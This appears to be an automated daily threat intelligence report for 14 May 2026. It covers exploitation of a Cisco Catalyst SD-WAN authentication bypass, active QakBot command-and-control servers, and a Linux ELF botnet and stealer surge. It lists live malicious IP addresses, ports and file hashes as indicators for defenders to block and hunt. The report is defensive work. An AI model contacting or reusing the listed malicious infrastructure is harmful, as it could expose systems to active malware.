Daily Threat Intelligence Report โ 2026-05-14
Today's threat landscape is dominated by three converging threats: active QakBot and Emotet C2 infrastructure confirmed by Feodotracker across US, UK, and Japanese hosting providers; active exploitation of CVE-2026-20182 (Cisco Catalyst SD-WAN authentication bypass) tracked by AlienVault OTX and CISA KEV with 33 confirmed IOCs attributed to threat actor UAT-8616; and a surge in Linux ELF malware distribution including Mirai botnet samples and Wraith-tagged payloads observed across MalwareBazaar and URLhaus malware download infrastructure. Immediate actions required: block all five Feodotracker C2 IPs at perimeter, apply Cisco SD-WAN patches per CISA Emergency Directive 26-03, and hunt for UPX-packed ELF executions on Linux endpoints. Additionally, CISA KEV lists four other critical vulnerabilities including Palo Alto PAN-OS RCE (CVE-2026-0300), Ivanti EPMM RCE (CVE-2026-6973), Microsoft Exchange XSS (CVE-2026-42897), and BerriAI LiteLLM SQLi (CVE-2026-42208) requiring immediate patching.
Active Exploitation of Cisco Catalyst SD-WAN Authentication Bypass (CVE-2026-20182) by UAT-8616
CRITICAL UAT-8616Threat actor UAT-8616 is actively exploiting CVE-2026-20182, a critical authentication bypass vulnerability in Cisco Catalyst SD-WAN Controller and Manager, enabling unauthenticated remote attackers to obtain full administrative privileges. This campaign is confirmed by AlienVault OTX with 33 associated IOCs and corroborated by CISA's Known Exploited Vulnerabilities catalogue with an active Emergency Directive (ED 26-03). Successful exploitation grants attackers complete control over SD-WAN fabric, enabling network traffic manipulation, lateral movement, persistent backdoor installation, and potential supply-chain-style pivoting into connected enterprise networks. CISA mandates immediate remediation per ED 26-03 and has published specific Hunt and Hardening Guidance for Cisco SD-WAN devices; organizations unable to patch immediately must assess exposure and consider isolation of affected controllers.
QakBot Banking Trojan C2 Infrastructure Active Across Three Countries โ Imminent Financial Sector Risk
HIGH TA505Feodotracker has confirmed three active QakBot command-and-control servers operational across US (50.16.16.211, 34.204.119.63), UK (178.62.3.223), and Japan (27.133.154.218) infrastructure, indicating a geographically distributed and resilient C2 architecture actively supporting live QakBot infections. QakBot (also known as QBot/Pinkslipbot) is a sophisticated banking trojan historically associated with TA505 operations, known for credential theft, lateral movement, and serving as a precursor loader for ransomware deployments including Black Basta and Conti. The multi-country hosting pattern is consistent with TA505's documented use of compromised legitimate infrastructure to evade geo-based blocking and maintain operational continuity even when individual nodes are taken down. Organizations with active infections may be at imminent risk of credential exfiltration and ransomware pre-positioning; immediate blocking and retroactive hunting across 90 days of network logs is strongly advised.
Coordinated Linux ELF Botnet Recruitment Campaign โ Mirai, Wraith, and UPX-Packed Malware Surge via Malware Download Infrastructure
MEDIUM Unknown Threat ActorMalwareBazaar has identified a cluster of nine Linux ELF binaries submitted within the last 24 hours โ the majority UPX-packed โ alongside two samples tagged with the 'wraith' stealer designation, and one confirmed Mirai botnet sample (cf3d2fc280979eca3e83eb37e9eaacaa9029b83e315840ba89892a0a08ebd1e9). These are being distributed via URLhaus-confirmed malware download infrastructure using non-standard high-numbered TCP ports (33129, 48114, 48707, 54809, 32782, 35600) across IP addresses geolocated to China, Pakistan, and Australia, consistent with compromised IoT and home router infrastructure used as distribution nodes. The Wraith-tagged ELF samples (5e9747bbc50448329ec19615861b53c11398ccd171c4c7e5c227e0c1d73fb219, e98b8422076992dd1ee7a6ee4a7ca71b08004d8a80104186ad01490d5eba7e45, aef8c86b9a3d3d4392641868a17670c82ae136fdc9767277fbf81fdbeb566ac8) indicate a potential Go-based stealer component alongside the botnet recruitment activity, suggesting a dual-purpose campaign targeting both Linux server compromise and credential theft. GitHub/stamparm maltrail updates to ClearFake and OSX Atomic tracking files indicate parallel expansion of this threat across multiple platforms.